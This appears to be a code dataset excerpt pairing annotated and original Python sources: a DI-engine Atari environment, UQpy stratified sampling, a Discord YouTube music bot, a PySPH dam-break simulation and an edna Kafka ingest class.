                    self._env_done[i] = True
                    self._done_obs[i] = copy.deepcopy(timestep[j].obs)
                obs.append(timestep[j].obs)
                j += 1
        obs = np.concatenate(obs, axis=0)
        info = {}
        if done:
            info['final_eval_reward'] = self._final_eval_reward
        return BaseEnvTimestep(obs, reward, done, info)
    def info(self) -> BaseEnvInfo:
        # NOTE(review): the result of this call is never used -- dead statement?
        info = self._env[0].info()
        T = EnvElementInfo
        if self._cfg.env_id in ATARIENV_INFO_DICT:
            obs_shape = list(ATARIENV_INFO_DICT[self._cfg.env_id].obs_space.shape)
            n = ATARIENV_INFO_DICT[self._cfg.env_id].act_space.shape[0]
        else:
            raise NotImplementedError('{} not found in ATARIENV_INFO_DICT [{}]'\
                .format(self._cfg.env_id, ATARIENV_INFO_DICT.keys()))
        # Observations are stacked along the first axis, one slice per sub-env.
        obs_shape[0] = obs_shape[0] * self._multi_env_num
        obs_space = T(obs_shape, {'dtype': np.float32}, None, None)
        act_shape = tuple([n for _ in range(self._multi_env_num)])
        act_space = T(act_shape, {'dtype': np.float32}, None, None)
        rew_space = T(1, {'min': -self._multi_env_num, 'max': self._multi_env_num, 'dtype': np.float32}, None, None)
        return BaseEnvInfo(
            agent_num=self._multi_env_num,
            obs_space=obs_space,
            act_space=act_space,
            rew_space=rew_space,
        )
    def __repr__(self) -> str:
        return "DI-engine Atari Multi Discrete Env({})".format(self._cfg.env_id)
    @staticmethod
    def create_collector_env_cfg(cfg: dict) -> List[dict]:
        # Replicate the config once per collector env, with is_train=True.
        collector_env_num = cfg.pop('collector_env_num', 1)
        cfg = copy.deepcopy(cfg)
        cfg.is_train = True
        return [cfg for _ in range(collector_env_num)]
    @staticmethod
    def create_evaluator_env_cfg(cfg: dict) -> List[dict]:
        # Replicate the config once per evaluator env, with is_train=False.
        evaluator_env_num = cfg.pop('evaluator_env_num', 1)
        cfg = copy.deepcopy(cfg)
        cfg.is_train = False
        return [cfg for _ in range(evaluator_env_num)]
import logging
from beartype import beartype
from numpy.random import RandomState
from UQpy.sampling.stratified_sampling.baseclass.StratifiedSampling import StratifiedSampling
from UQpy.distributions import DistributionContinuous1D, JointIndependent
from UQpy.sampling.stratified_sampling.strata import RectangularStrata
from UQpy.sampling.stratified_sampling.strata.baseclass.Strata import Strata
from UQpy.utilities.ValidationTypes import *
class TrueStratifiedSampling(StratifiedSampling):
    """Stratified sampling over a stratified unit hypercube (:cite:`StratifiedSampling1`).

    Samples are first drawn on :math:`[0, 1]^n` according to `strata_object` and
    then mapped to the target `distributions` through the inverse CDF. If either
    `nsamples_per_stratum` or `nsamples` is given at construction, :meth:`run`
    executes automatically; otherwise the user must call :meth:`run`.
    """
    @beartype
    def __init__(
        self,
        distributions: Union[DistributionContinuous1D, JointIndependent, list[DistributionContinuous1D]],
        strata_object: Strata,
        nsamples_per_stratum: Union[int, list[int]] = None,
        nsamples: int = None,
        random_state: RandomStateType = None,
    ):
        """
        :param distributions: List of :class:`.Distribution` objects, one per random variable.
        :param strata_object: Stratification of the unit hypercube; an object of a
            :class:`.Strata` child class (:class:`.Rectangular`, :class:`.Voronoi`,
            or :class:`.Delaunay`).
        :param nsamples_per_stratum: Number of samples per stratum. An integer draws
            equally from every stratum; a list (length equal to the number of strata)
            sets each count individually.
        :param nsamples: Total number of samples, allocated to the strata in
            proportion to their volume (:code:`round(V_i * nsamples)` per stratum).
        :param random_state: Seed (int) or :class:`numpy.random.RandomState` object
            for the pseudo-random number generator. Default is :any:`None`.
        """
        self.logger = logging.getLogger(__name__)
        self.weights: NumpyFloatArray = None
        """Individual sample weights."""
        self.strata_object = strata_object
        self.nsamples_per_stratum = nsamples_per_stratum
        self.nsamples = nsamples
        self.samples: NumpyFloatArray = None
        """The generated samples following the prescribed distribution."""
        self.samplesU01: NumpyFloatArray = None
        """The generated samples on the unit hypercube."""
        self.distributions = distributions
        # Normalize the random_state argument: int -> RandomState, validate type,
        # and fall back to the strata object's generator when nothing is given.
        self.random_state = random_state
        if isinstance(self.random_state, int):
            self.random_state = RandomState(self.random_state)
        elif not isinstance(self.random_state, (type(None), RandomState)):
            raise TypeError('UQpy: random_state must be None, an int or an np.random.RandomState object.')
        if self.random_state is None:
            self.random_state = self.strata_object.random_state
        if isinstance(self.strata_object, RectangularStrata):
            self.strata_object.check_centered(nsamples)
        self.logger.info("UQpy: Stratified_sampling object is created")
        # Auto-run when either sampling budget was supplied up front.
        if self.nsamples_per_stratum is not None or self.nsamples is not None:
            self.run(nsamples_per_stratum=self.nsamples_per_stratum,
                     nsamples=self.nsamples)

    def transform_samples(self, samples01):
        """Map unit-hypercube samples to the target distributions via the inverse CDF.

        :param samples01: :class:`numpy.ndarray` of samples on :math:`[0, 1]^n`.
        """
        transformed = np.zeros_like(samples01)
        for column in range(samples01.shape[1]):
            transformed[:, column] = self.distributions[column].icdf(samples01[:, column])
        self.samples = transformed

    @beartype
    def run(
        self,
        nsamples_per_stratum: Union[None, int, list[int]] = None,
        nsamples: Union[None, PositiveInteger] = None,
    ):
        """Execute stratified sampling.

        Draws samples on the unit hypercube per stratum (child-class specific) and
        then transforms them to the prescribed distributions.

        :param nsamples_per_stratum: Per-stratum sample counts; int (equal counts)
            or list (one count per stratum).
        :param nsamples: Total sample count, split across strata proportionally to
            their volume.
        """
        self.nsamples_per_stratum = nsamples_per_stratum
        self.nsamples = nsamples
        self._run_checks()
        self.logger.info("UQpy: Performing Stratified Sampling")
        self.create_unit_hypercube_samples()
        self.transform_samples(self.samplesU01)
        self.logger.info("UQpy: Stratified Sampling is completed")

    def _run_checks(self):
        # Normalize `nsamples` / `nsamples_per_stratum` into per-stratum counts.
        if self.nsamples is not None:
            # Allocate samples proportionally to stratum volume.
            self.nsamples_per_stratum = (self.strata_object.volume * self.nsamples).round()
        if self.nsamples_per_stratum is None:
            # Default: a single sample in every stratum.
            self.nsamples_per_stratum = [1] * self.strata_object.volume.shape[0]
        elif isinstance(self.nsamples_per_stratum, int):
            self.nsamples_per_stratum = [self.nsamples_per_stratum] * \
                                        self.strata_object.volume.shape[0]
        elif isinstance(self.nsamples_per_stratum, list):
            if len(self.nsamples_per_stratum) != self.strata_object.volume.shape[0]:
                raise ValueError("UQpy: Length of 'nsamples_per_stratum' must match the number of strata.")
        elif self.nsamples is None:
            raise ValueError("UQpy: 'nsamples_per_stratum' must be an integer or a list.")

    def create_unit_hypercube_samples(self):
        # Delegate per-stratum drawing to the strata object, then stack the results.
        strata_samples, strata_weights = self.strata_object.sample_strata(
            self.nsamples_per_stratum, self.random_state)
        self.weights = np.array(strata_weights)
        self.samplesU01 = np.concatenate(strata_samples, axis=0)
from beartype import beartype
from numpy.random import RandomState
from UQpy.sampling.stratified_sampling.baseclass.StratifiedSampling import StratifiedSampling
from UQpy.distributions import DistributionContinuous1D, JointIndependent
from UQpy.sampling.stratified_sampling.strata import RectangularStrata
from UQpy.sampling.stratified_sampling.strata.baseclass.Strata import Strata
from UQpy.utilities.ValidationTypes import *
class TrueStratifiedSampling(StratifiedSampling):
    @beartype
    def __init__(
        self,
        distributions: Union[DistributionContinuous1D, JointIndependent, list[DistributionContinuous1D]],
        strata_object: Strata,
        nsamples_per_stratum: Union[int, list[int]] = None,
        nsamples: int = None,
        random_state: RandomStateType = None,
    ):
        """
        Class for Stratified Sampling (:cite:`StratifiedSampling1`).

        :param distributions: List of :class:`.Distribution` objects corresponding to each random variable.
        :param strata_object: Defines the stratification of the unit hypercube. This must be provided and must be an
            object of a :class:`.Strata` child class: :class:`.Rectangular`, :class:`.Voronoi`, or :class:`.Delaunay`.
        :param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
            integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is
            provided as a list, the length of the list must be equal to the number of strata.
            If `nsamples_per_stratum` is provided when the class is defined, the :meth:`run` method will be
            executed automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class
            is defined, the user must call the :meth:`run` method to perform stratified sampling.
        :param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
            be drawn in proportion to the volume of the strata. Thus, each stratum will contain
            :code:`round(V_i*nsamples)` samples.
            If `nsamples` is provided when the class is defined, the :meth:`run` method will be executed
            automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
            defined, the user must call the :meth:`run` method to perform stratified sampling.
        :param random_state: Random seed used to initialize the pseudo-random number generator. Default is
            :any:`None`. If an :any:`int` is provided, this sets the seed for an object of
            :class:`numpy.random.RandomState`. Otherwise, the object itself can be passed directly.
        """
        self.logger = logging.getLogger(__name__)
        self.weights: NumpyFloatArray = None
        """Individual sample weights."""
        self.strata_object = strata_object
        self.nsamples_per_stratum = nsamples_per_stratum
        self.nsamples = nsamples
        self.samples: NumpyFloatArray = None
        """The generated samples following the prescribed distribution."""
        self.samplesU01: NumpyFloatArray = None
        """The generated samples on the unit hypercube."""
        self.distributions = distributions
        self.random_state = random_state
        # Normalize random_state: an int seeds a fresh RandomState; anything other
        # than None or a RandomState instance is rejected.
        if isinstance(self.random_state, int):
            self.random_state = RandomState(self.random_state)
        elif not isinstance(self.random_state, (type(None), RandomState)):
            raise TypeError('UQpy: random_state must be None, an int or an np.random.RandomState object.')
        if self.random_state is None:
            # Fall back to the generator owned by the strata object so that the
            # sampling shares the stratification's reproducibility settings.
            self.random_state = self.strata_object.random_state
        if isinstance(self.strata_object, RectangularStrata):
            self.strata_object.check_centered(nsamples)
        self.logger.info("UQpy: Stratified_sampling object is created")
        # Sampling runs immediately when either sample count was supplied at
        # construction time; otherwise the user must call run() explicitly.
        if self.nsamples_per_stratum is not None or self.nsamples is not None:
            self.run(nsamples_per_stratum=self.nsamples_per_stratum,
                     nsamples=self.nsamples)

    def transform_samples(self, samples01):
        """
        Transform samples in the unit hypercube :math:`[0, 1]^n` to the prescribed distribution using the
        inverse CDF.

        :param samples01: :class:`numpy.ndarray` containing the generated samples on :math:`[0, 1]^n`.
        :return: :class:`numpy.ndarray` containing the generated samples following the prescribed distribution.
        """
        # Apply each marginal distribution's inverse CDF column-by-column
        # (one column per random variable).
        samples_u_to_x = np.zeros_like(samples01)
        for j in range(samples01.shape[1]):
            samples_u_to_x[:, j] = self.distributions[j].icdf(samples01[:, j])
        self.samples = samples_u_to_x

    @beartype
    def run(
        self,
        nsamples_per_stratum: Union[None, int, list[int]] = None,
        nsamples: Union[None, PositiveInteger] = None,
    ):
        r"""
        Executes stratified sampling.

        This method performs the sampling for each of the child classes by running two methods:
        :meth:`create_unit_hypercube_samples`, and :meth:`transform_samples`. The
        :meth:`create_unit_hypercube_samples` method is unique to each child class and therefore must be
        overwritten when a new child class is defined. The :meth:`transform_samples` method is common to all
        stratified sampling classes and is therefore defined by the parent class. It does not need to be
        modified.

        If `nsamples` or `nsamples_per_stratum` is provided when the class is defined, the :meth:`run`
        method will be executed automatically. If neither `nsamples_per_stratum` or `nsamples` are provided
        when the class is defined, the user must call the :meth:`run` method to perform stratified sampling.

        :param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
            integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is
            provided as a list, the length of the list must be equal to the number of strata.
        :param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
            be drawn in proportion to the volume of the strata. Thus, each stratum will contain
            :code:`round(V_i*nsamples)` samples where :math:`V_i \le 1` is the volume of stratum `i` in the
            unit hypercube.
        """
        self.nsamples_per_stratum = nsamples_per_stratum
        self.nsamples = nsamples
        self._run_checks()
        self.logger.info("UQpy: Performing Stratified Sampling")
        self.create_unit_hypercube_samples()
        self.transform_samples(self.samplesU01)
        self.logger.info("UQpy: Stratified Sampling is completed")

    def _run_checks(self):
        # Validate and normalize the requested sample counts into a per-stratum
        # sequence. `nsamples` takes precedence: counts are allocated in
        # proportion to each stratum's volume.
        if self.nsamples is not None:
            # NOTE(review): .round() yields a float ndarray here, not ints —
            # presumably accepted downstream by strata_object.sample_strata; confirm.
            self.nsamples_per_stratum = (self.strata_object.volume * self.nsamples).round()
        if self.nsamples_per_stratum is not None:
            if isinstance(self.nsamples_per_stratum, int):
                # Equal allocation: the same count in every stratum.
                self.nsamples_per_stratum = [self.nsamples_per_stratum] * \
                    self.strata_object.volume.shape[0]
            elif isinstance(self.nsamples_per_stratum, list):
                if len(self.nsamples_per_stratum) != self.strata_object.volume.shape[0]:
                    raise ValueError("UQpy: Length of 'nsamples_per_stratum' must match the number of strata.")
            elif self.nsamples is None:
                raise ValueError("UQpy: 'nsamples_per_stratum' must be an integer or a list.")
        else:
            # Default when nothing was requested: one sample per stratum.
            self.nsamples_per_stratum = [1] * self.strata_object.volume.shape[0]

    def create_unit_hypercube_samples(self):
        # Draw samples within each stratum on the unit hypercube and record the
        # associated per-sample weights reported by the strata object.
        samples_in_strata, weights = self.strata_object.sample_strata(
            self.nsamples_per_stratum, self.random_state)
        self.weights = np.array(weights)
        self.samplesU01 = np.concatenate(samples_in_strata, axis=0)
import json
import discord
from discord.ext import commands
from discord_slash import SlashCommand, SlashContext
from discord_slash.utils.manage_commands import create_option
import youtube_dl
guilds_ids = [
    # enter your guild IDs here
]
# Read the bot token from token.json (expected shape: [{"token": "..."}]).
with open('token.json') as jj:
    data = json.load(jj)
    tk = data[0]['token']
bot = commands.Bot(command_prefix='>')
# Slash-command handler; sync_commands re-registers commands with Discord on start.
slash = SlashCommand(client=bot, sync_commands=True)
@bot.event
async def on_ready():
    """Set the bot's presence once connected and log readiness to stdout."""
    await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.listening, name='/play'))
    print('ready')
@slash.slash(
    name='join',
    description='Joins To Your Channel',
    guild_ids=guilds_ids
)
async def _join(ctx: SlashContext):
    """Join the voice channel of the invoking user.

    Refuses when the user is not in a voice channel, or when the bot is
    already connected elsewhere.
    """
    if ctx.author.voice is None:
        # Bail out early: without a voice state there is no channel to join.
        # (The original fell through and raised AttributeError below.)
        await ctx.send(":no_entry_sign: - You aren't in the voice channel!")
        return
    if ctx.voice_client is None:
        await ctx.author.voice.channel.connect()
        await ctx.send(f':thumbsup: - Joined to `{ctx.author.voice.channel.name}`')
    else:
        await ctx.send(':no_entry_sign: - Other user is using this bot!')
@slash.slash(
    name='disconnect',
    description='Disconnects Of Your Channel',
    guild_ids=guilds_ids
)
async def _disconnect(ctx: SlashContext):
    """Disconnect the bot from its current voice channel."""
    if ctx.voice_client is None:
        # Guard: calling disconnect() without a connection would raise
        # AttributeError on None.
        await ctx.send(':no_entry_sign: - I am not in a voice channel!')
        return
    await ctx.voice_client.disconnect()
    await ctx.send(':thumbsup: - Disconnected!')
@slash.slash(
    name='play',
    description='Plays Music',
    guild_ids=guilds_ids,
    options=[
        create_option(
            name='url',
            description='Youtube URL',
            option_type=str,
            required=True
        )
    ]
)
async def _play(ctx: SlashContext, url: str):
    """Resolve a YouTube URL to an audio stream and play it in the current voice channel."""
    # FFmpeg reconnect options keep the stream alive across transient network drops;
    # -vn discards the video stream.
    FFMPEG_OPTIONS = {
        'before_options':
        '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',
        'options': '-vn'
    }
    YDL_OPTIONS = {'format': "bestaudio"}
    await ctx.send(f'**Searching** :link: `{url}`...')
    # NOTE(review): extract_info is blocking and runs on the event loop — consider
    # loop.run_in_executor. Also formats[0] is assumed to be the stream selected by
    # 'bestaudio'; confirm against youtube_dl's format ordering.
    with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:
        info = ydl.extract_info(url, download=False)
        url2 = info['formats'][0]['url']
        source = await discord.FFmpegOpusAudio.from_probe(url2, **FFMPEG_OPTIONS)
        ctx.voice_client.play(source)
        await ctx.send(f'**Playing** :notes: `{url}` - Now!')
@slash.slash(
    name='pause',
    description='Pauses Music',
    guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
    """Pause the currently playing audio."""
    # VoiceClient.pause() is a regular (synchronous) method in discord.py;
    # awaiting its None return value raises TypeError.
    ctx.voice_client.pause()
    await ctx.send(':thumbsup: - Paused!')
@slash.slash(
    name='resume',
    description='Resumes Music',
    guild_ids=guilds_ids
)
async def _resume(ctx: SlashContext):
    """Resume playback of paused audio."""
    # Renamed from a duplicate `_pause` definition that shadowed the pause
    # handler. VoiceClient.resume() is synchronous, so it must not be awaited,
    # and the confirmation message now says "Resumed" rather than "Paused".
    ctx.voice_client.resume()
    await ctx.send(':thumbsup: - Resumed!')
bot.run(tk) | bot_slash.py | import json
import discord
from discord.ext import commands
from discord_slash import SlashCommand, SlashContext
from discord_slash.utils.manage_commands import create_option
import youtube_dl
guilds_ids = [
# enter your guild IDs here
]
with open('token.json') as jj:
data = json.load(jj)
tk = data[0]['token']
bot = commands.Bot(command_prefix='>')
slash = SlashCommand(client=bot, sync_commands=True)
@bot.event
async def on_ready():
await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.listening, name='/play'))
print('ready')
@slash.slash(
name='join',
description='Joins To Your Channel',
guild_ids=guilds_ids
)
async def _join(ctx: SlashContext):
if ctx.author.voice is None:
await ctx.send(':no_entry_sign: - You arent in the voice channel!')
if ctx.voice_client is None:
await ctx.author.voice.channel.connect()
await ctx.send(f':thumbsup: - Joined to `{ctx.author.voice.channel.name}`')
else:
await ctx.send(':no_entry_sign: - Other user is using this bot!')
@slash.slash(
name='disconnect',
description='Disconnects Of Your Channel',
guild_ids=guilds_ids
)
async def _disconnect(ctx: SlashContext):
await ctx.voice_client.disconnect()
await ctx.send(':thumbsup: - Disconnected!')
@slash.slash(
name='play',
description='Plays Music',
guild_ids=guilds_ids,
options=[
create_option(
name='url',
description='Youtube URL',
option_type=str,
required=True
)
]
)
async def _play(ctx: SlashContext, url: str):
FFMPEG_OPTIONS = {
'before_options':
'-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',
'options': '-vn'
}
YDL_OPTIONS = {'format': "bestaudio"}
await ctx.send(f'**Searching** :link: `{url}`...')
with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:
info = ydl.extract_info(url, download=False)
url2 = info['formats'][0]['url']
source = await discord.FFmpegOpusAudio.from_probe(url2, **FFMPEG_OPTIONS)
ctx.voice_client.play(source)
await ctx.send(f'**Playing** :notes: `{url}` - Now!')
@slash.slash(
name='pause',
description='Pauses Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.pause()
await ctx.send(':thumbsup: - Paused!')
@slash.slash(
name='resume',
description='Resumes Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.resume()
await ctx.send(':thumbsup: - Paused!')
bot.run(tk) | 0.28877 | 0.0809 |
from os.path import dirname, join
import numpy as np
from pysph.examples._db_geometry import DamBreak3DGeometry
from pysph.base.kernels import WendlandQuintic
from pysph.base.utils import get_particle_array_rigid_body
from pysph.sph.equation import Group
from pysph.sph.basic_equations import ContinuityEquation, XSPHCorrection
from pysph.sph.wc.basic import TaitEOS, TaitEOSHGCorrection, MomentumEquation
from pysph.solver.application import Application
from pysph.solver.solver import Solver
from pysph.sph.integrator import EPECIntegrator
from pysph.sph.integrator_step import WCSPHStep
from pysph.tools.gmsh import vtk_file_to_points
from pysph.sph.rigid_body import (
BodyForce, NumberDensity, RigidBodyForceGPUGems,
RigidBodyMoments, RigidBodyMotion,
RK2StepRigidBody, PressureRigidBody
)
dim = 3        # spatial dimension
dt = 1e-5      # initial time step; adaptive stepping is enabled in the solver
tf = 2.0       # final simulation time
# parameter to change the resolution
dx = 0.02
nboundary_layers = 3
hdx = 1.2      # ratio of smoothing length to particle spacing
rho0 = 1000.0  # reference density (water)
class DamBreak3DSPH(Application):
    """3D dam-break WCSPH simulation with a rigid-body obstacle loaded from a VTK point cloud."""

    def initialize(self):
        # Build the dam-break geometry. The obstacle is created separately in
        # create_particles from a VTK file, hence with_obstacle=False here.
        self.geom = DamBreak3DGeometry(
            dx=dx, nboundary_layers=nboundary_layers, hdx=hdx, rho0=rho0,
            with_obstacle=False)

    def create_particles(self):
        """Create the fluid/boundary particle arrays plus a rigid-body obstacle
        read from 'sph.vtk.gz' alongside this script."""
        fluid, boundary = self.geom.create_particles()
        fpath = join(dirname(__file__), 'sph.vtk.gz')
        x, y, z = vtk_file_to_points(fpath, cell_centers=False)
        # Reposition the obstacle point cloud inside the tank.
        y -= 0.15
        z += 0.05
        # Obstacle particles inherit mass, smoothing length and density from the
        # first fluid particle so the resolutions match.
        m = np.ones_like(x)*fluid.m[0]
        h = np.ones_like(x)*fluid.h[0]
        rho = np.ones_like(x)*fluid.rho[0]
        obstacle = get_particle_array_rigid_body(
            name='obstacle', x=x, y=y, z=z, m=m, h=h, rho=rho, rho0=rho
        )
        obstacle.total_mass[0] = np.sum(m)
        # Extra properties required by the WCSPH equations that also operate on
        # the obstacle (sound speed, density rate).
        obstacle.add_property('cs')
        obstacle.add_property('arho')
        obstacle.set_lb_props(list(obstacle.properties.keys()))
        obstacle.set_output_arrays(
            ['x', 'y', 'z', 'u', 'v', 'w', 'fx', 'fy', 'fz',
             'rho', 'm', 'h', 'p', 'tag', 'pid', 'gid']
        )
        # Properties needed by the rigid-body force computation on the boundary.
        boundary.add_property('V')
        boundary.add_property('fx')
        boundary.add_property('fy')
        boundary.add_property('fz')
        return [fluid, boundary, obstacle]

    def create_solver(self):
        """Configure the solver: WCSPH stepping for fluid/boundary, RK2 rigid-body
        stepping for the obstacle."""
        kernel = WendlandQuintic(dim=dim)
        integrator = EPECIntegrator(fluid=WCSPHStep(),
                                    obstacle=RK2StepRigidBody(),
                                    boundary=WCSPHStep())
        solver = Solver(kernel=kernel, dim=dim, integrator=integrator,
                        tf=tf, dt=dt, adaptive_timestep=True, n_damp=0)
        return solver

    def create_equations(self):
        """Assemble the SPH equation groups: body forces, equation of state,
        continuity/momentum/XSPH, and the rigid-body moment/motion updates."""
        # Speed of sound scaled well above the maximum expected flow speed.
        co = 10.0 * self.geom.get_max_speed(g=9.81)
        gamma = 7.0
        alpha = 0.5  # artificial viscosity coefficient
        beta = 0.0
        equations = [
            Group(equations=[
                BodyForce(dest='obstacle', sources=None, gz=-9.81),
                NumberDensity(dest='obstacle', sources=['obstacle']),
                NumberDensity(dest='boundary', sources=['boundary']),
            ], ),
            # Equation of state
            Group(equations=[
                TaitEOS(
                    dest='fluid', sources=None, rho0=rho0, c0=co,
                    gamma=gamma
                ),
                TaitEOSHGCorrection(
                    dest='boundary', sources=None, rho0=rho0, c0=co,
                    gamma=gamma
                ),
                TaitEOSHGCorrection(
                    dest='obstacle', sources=None, rho0=rho0, c0=co,
                    gamma=gamma
                ),
            ], real=False),
            # Continuity, momentum and xsph equations
            Group(equations=[
                ContinuityEquation(
                    dest='fluid', sources=['fluid', 'boundary', 'obstacle']
                ),
                ContinuityEquation(dest='boundary', sources=['fluid']),
                ContinuityEquation(dest='obstacle', sources=['fluid']),
                MomentumEquation(dest='fluid',
                                 sources=['fluid', 'boundary'],
                                 alpha=alpha, beta=beta, gz=-9.81, c0=co,
                                 tensile_correction=True),
                PressureRigidBody(
                    dest='fluid', sources=['obstacle'], rho0=rho0
                ),
                XSPHCorrection(dest='fluid', sources=['fluid']),
                RigidBodyForceGPUGems(
                    dest='obstacle', sources=['boundary'], k=1.0, d=2.0,
                    eta=0.1, kt=0.1
                ),
            ]),
            # Aggregate forces into rigid-body moments, then update its motion.
            Group(equations=[RigidBodyMoments(dest='obstacle', sources=None)]),
            Group(equations=[RigidBodyMotion(dest='obstacle', sources=None)]),
        ]
        return equations
if __name__ == '__main__':
    # Script entry point: build and run the simulation.
    app = DamBreak3DSPH()
    app.run()
import numpy as np
from pysph.examples._db_geometry import DamBreak3DGeometry
from pysph.base.kernels import WendlandQuintic
from pysph.base.utils import get_particle_array_rigid_body
from pysph.sph.equation import Group
from pysph.sph.basic_equations import ContinuityEquation, XSPHCorrection
from pysph.sph.wc.basic import TaitEOS, TaitEOSHGCorrection, MomentumEquation
from pysph.solver.application import Application
from pysph.solver.solver import Solver
from pysph.sph.integrator import EPECIntegrator
from pysph.sph.integrator_step import WCSPHStep
from pysph.tools.gmsh import vtk_file_to_points
from pysph.sph.rigid_body import (
BodyForce, NumberDensity, RigidBodyForceGPUGems,
RigidBodyMoments, RigidBodyMotion,
RK2StepRigidBody, PressureRigidBody
)
dim = 3
dt = 1e-5
tf = 2.0
# parameter to change the resolution
dx = 0.02
nboundary_layers = 3
hdx = 1.2
rho0 = 1000.0
class DamBreak3DSPH(Application):
def initialize(self):
self.geom = DamBreak3DGeometry(
dx=dx, nboundary_layers=nboundary_layers, hdx=hdx, rho0=rho0,
with_obstacle=False)
def create_particles(self):
fluid, boundary = self.geom.create_particles()
fpath = join(dirname(__file__), 'sph.vtk.gz')
x, y, z = vtk_file_to_points(fpath, cell_centers=False)
y -= 0.15
z += 0.05
m = np.ones_like(x)*fluid.m[0]
h = np.ones_like(x)*fluid.h[0]
rho = np.ones_like(x)*fluid.rho[0]
obstacle = get_particle_array_rigid_body(
name='obstacle', x=x, y=y, z=z, m=m, h=h, rho=rho, rho0=rho
)
obstacle.total_mass[0] = np.sum(m)
obstacle.add_property('cs')
obstacle.add_property('arho')
obstacle.set_lb_props(list(obstacle.properties.keys()))
obstacle.set_output_arrays(
['x', 'y', 'z', 'u', 'v', 'w', 'fx', 'fy', 'fz',
'rho', 'm', 'h', 'p', 'tag', 'pid', 'gid']
)
boundary.add_property('V')
boundary.add_property('fx')
boundary.add_property('fy')
boundary.add_property('fz')
return [fluid, boundary, obstacle]
def create_solver(self):
kernel = WendlandQuintic(dim=dim)
integrator = EPECIntegrator(fluid=WCSPHStep(),
obstacle=RK2StepRigidBody(),
boundary=WCSPHStep())
solver = Solver(kernel=kernel, dim=dim, integrator=integrator,
tf=tf, dt=dt, adaptive_timestep=True, n_damp=0)
return solver
def create_equations(self):
co = 10.0 * self.geom.get_max_speed(g=9.81)
gamma = 7.0
alpha = 0.5
beta = 0.0
equations = [
Group(equations=[
BodyForce(dest='obstacle', sources=None, gz=-9.81),
NumberDensity(dest='obstacle', sources=['obstacle']),
NumberDensity(dest='boundary', sources=['boundary']),
], ),
# Equation of state
Group(equations=[
TaitEOS(
dest='fluid', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='boundary', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='obstacle', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
], real=False),
# Continuity, momentum and xsph equations
Group(equations=[
ContinuityEquation(
dest='fluid', sources=['fluid', 'boundary', 'obstacle']
),
ContinuityEquation(dest='boundary', sources=['fluid']),
ContinuityEquation(dest='obstacle', sources=['fluid']),
MomentumEquation(dest='fluid',
sources=['fluid', 'boundary'],
alpha=alpha, beta=beta, gz=-9.81, c0=co,
tensile_correction=True),
PressureRigidBody(
dest='fluid', sources=['obstacle'], rho0=rho0
),
XSPHCorrection(dest='fluid', sources=['fluid']),
RigidBodyForceGPUGems(
dest='obstacle', sources=['boundary'], k=1.0, d=2.0,
eta=0.1, kt=0.1
),
]),
Group(equations=[RigidBodyMoments(dest='obstacle', sources=None)]),
Group(equations=[RigidBodyMotion(dest='obstacle', sources=None)]),
]
return equations
if __name__ == '__main__':
app = DamBreak3DSPH()
app.run() | 0.557123 | 0.391929 |
from edna.serializers import Serializable
from edna.ingest.streaming import BaseStreamingIngest
from typing import Dict
import confluent_kafka, confluent_kafka.admin
from time import sleep
import socket
class KafkaIngest(BaseStreamingIngest):
    """KafkaIngest streams records from a provided kafka topic into the Job.

    Records are deserialized with the provided serializer.
    """

    def __init__(self, serializer: Serializable, kafka_topic: str, bootstrap_server: str = "localhost", bootstrap_port: int = 9092, default_group: str = "default-group", *args, **kwargs):
        """Connects to a kafka topic and sets up the ingest.

        Args:
            serializer (Serializable): Serializer used to deserialize messages consumed from Kafka.
            kafka_topic (str): Name of the kafka topic to consume from.
            bootstrap_server (str, optional): Address of the Kafka bootstrap server. Defaults to "localhost".
            bootstrap_port (int, optional): Bootstrap server port on which the topic is listening for messages. Defaults to 9092.
            default_group (str, optional): Group name for this consumer group. Defaults to "default-group".
        """
        self.kafka_topic = kafka_topic
        conf = {
            "bootstrap.servers": bootstrap_server + ":" + str(bootstrap_port),
            "client.id": socket.gethostname(),
            "group.id": default_group
        }
        self.create_topic(topic_name=kafka_topic, conf=conf)  # TODO is this safe?
        self.consumer = confluent_kafka.Consumer(conf)
        self.consumer.subscribe([self.kafka_topic])
        self.running = True
        super().__init__(serializer=serializer, *args, **kwargs)

    def next(self):
        """Polls the Kafka topic until a record is available and returns its raw value.

        Raises:
            KafkaException: Propagated from Kafka for any non-EOF consumer error.

        Returns:
            (obj): The raw value of the consumed record.
        """
        kafka_message = None
        while kafka_message is None:
            kafka_message = self.consumer.poll(timeout=1.0)
            if kafka_message is None:
                # No message available yet; back off briefly before polling again.
                sleep(0.1)
                continue
            if kafka_message.error():
                if kafka_message.error().code() == confluent_kafka.KafkaError._PARTITION_EOF:
                    # End-of-partition is not an error: discard and keep polling.
                    kafka_message = None
                else:
                    # Any other consumer error is fatal for this poll.
                    # (The original guarded this with a redundant
                    # `elif kafka_message.error():`, which is always true here.)
                    raise confluent_kafka.KafkaException(kafka_message.error())
        return kafka_message.value()

    def create_topic(self, topic_name: str, conf: Dict):
        """Helper function to create a topic. Blocks until the creation future resolves.

        Args:
            topic_name (str): Topic name to create.
            conf (Dict): Kafka admin client configuration.
        """
        adminclient = confluent_kafka.admin.AdminClient(conf=conf)
        topic = confluent_kafka.admin.NewTopic(topic=topic_name, num_partitions=1)
        response = adminclient.create_topics([topic])
        while not response[topic_name].done():
            sleep(0.1)  # TODO: poll the future with a timeout instead of busy-waiting.
        del adminclient
from edna.ingest.streaming import BaseStreamingIngest
